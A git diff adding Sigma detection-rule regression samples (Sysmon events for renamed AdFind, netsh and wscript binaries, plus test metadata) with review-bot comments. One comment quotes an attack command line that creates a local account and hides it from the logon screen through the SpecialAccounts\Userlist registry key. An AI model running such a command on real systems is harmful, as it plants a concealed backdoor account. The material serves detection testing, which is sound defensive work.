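Review bot: the `match_count: 1` in this folder's info.yml assumes the .evtx holds only the reg.exe event shown in the JSON, yet the parent command line (`"ParentCommandLine": "\"cmd.exe\" /c NET USER AtomicOperator$ ... & REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0"`) carries the same `SpecialAccounts\Userlist` string, so if the parent cmd.exe's own process-creation event was exported as well, the CommandLine rule 9ec9fb1b would fire twice and the regression test would fail; confirm the export contains exactly the one event. Separately, this sample embeds the contributor's identity (`"Computer": "srv-01.midgardnet.tech"`, `"User": "MIDGARDNET\\SwachchhandaP"`, a `CurrentDirectory` under `SWACHC~1`) where the other samples in this PR use a lab host (`ar-win-1`, `Administrator`); normalizing those fields before committing keeps the dataset consistent and avoids publishing personal hostnames and usernames, and the cleartext test password in the same command line deserves the same conscious decision. Finally, `description: N/A` should state what the sample simulates (a newly created local account hidden from the logon screen via the SpecialAccounts\Userlist key) so the test stays understandable when the rule changes.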
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx new file mode 100644 index 0000000000000000000000000000000000000000..0d04a62fd338fbe90b31752155647de76a37752a GIT binary patch literal 69632 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 I<;kr72eCS&nE(I) literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json new file mode 100644 index 000000000..4212ed2dd --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:26:58.441823Z" + } + }, + "EventRecordID": 256793, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:26:58.421", + "ProcessGuid": "5AB40FD1-3E12-68F9-1A31-000000003B02", + "ProcessId": 6856, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-AdFind.exe", + "FileVersion": "1.52.0.5064", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": "AdFind.exe", + "CommandLine": "renamed-AdFind.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=12011C44955FD6631113F68A99447515,SHA256=C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3,IMPHASH=12CE1C0F3F5837ECC18A3782408FA975", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
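Review bot: the sample executes the renamed binary with no arguments (`"CommandLine": "renamed-AdFind.exe"`, `"Description": "-"`), so it only exercises the PE-metadata branch of the rule (`OriginalFileName`, `Product`, `Company` disagreeing with `Image`). If rule df55196f also selects on the imphash in `Hashes` or on AdFind's usual command-line markers, those selections remain untested; either add a second event that covers them or record in info.yml which selection this sample is meant to pin, so a future rule change that alters an untested selection is not mistaken for a passing regression.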
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml new file mode 100644 index 000000000..535f0a655 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml @@ -0,0 +1,13 @@ +id: 09eb713e-f4b1-42ce-9c8e-d446ba0d548a +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: df55196f-f105-44d3-a675-e9dfb6cc2f2b + title: Renamed AdFind Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx 
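Review bot: `date: 2025-10-24` does not match the event's `SystemTime` of 2025-10-22, while the hide_user info.yml uses the event date (2025-10-31) for the same field; pick one convention (capture date or authoring date) and apply it to all info.yml files in this PR. `description: N/A` should also say what was recorded (AdFind 1.52.0.5064 copied to `renamed-AdFind.exe` and run without arguments), since the description is the only place a future maintainer can learn what the binary sample contains without opening the .evtx.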
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx new file mode 100644 index 0000000000000000000000000000000000000000..a445e60169d582f962fdfb3b4619a630d81e49ae GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json new file mode 100644 index 000000000..9e76fe811 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:29:25.275782Z" + } + }, + "EventRecordID": 256823, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:29:25.272", + "ProcessGuid": "5AB40FD1-3EA5-68F9-2F31-000000003B02", + "ProcessId": 4564, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-netsh.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Network Command Shell", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "netsh.exe", + "CommandLine": "renamed-netsh.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=28B5A3688253FD5822EE90BCAE2633F7,SHA256=7482890B1875BDCEC826F3385EAC7DCDC38F17358A13B1B8C790BDB895FF5054,IMPHASH=06F091DBEC9C3F0DD14808FFE59B95DE", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml new file mode 100644 index 000000000..1decc3d31 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml @@ -0,0 +1,13 @@ +id: e9861f82-77a9-4f8b-a418-0fbb6019588b +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 + title: Potential Defense Evasion Via Binary Rename +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx 
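Review bot: the folder carries only a `Positive Detection Test`; because `regression_tests_info` is a list, a negative sample (for example the same netsh.exe executed under its original name, expected to produce no match if the runner accepts a zero `match_count`) would additionally guard against the rule being loosened to fire on unrenamed system binaries. As with the other info.yml files, `description: N/A` should be filled in and `date: 2025-10-24` reconciled with the event's 2025-10-22 timestamp.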
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx new file mode 100644 index 0000000000000000000000000000000000000000..f673a38d5aac285821db6a222e5bac14687ee871 GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json new file mode 100644 index 000000000..679f6bc4a --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:28:22.116872Z" + } + }, + "EventRecordID": 256810, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:28:22.113", + "ProcessGuid": "5AB40FD1-3E66-68F9-2831-000000003B02", + "ProcessId": 4832, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-wscript.exe", + "FileVersion": "5.812.10240.16384", + "Description": "Microsoft ® Windows Based Script Host", + "Product": "Microsoft ® Windows Script Host", + "Company": "Microsoft Corporation", + "OriginalFileName": "wscript.exe", + "CommandLine": "renamed-wscript.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": 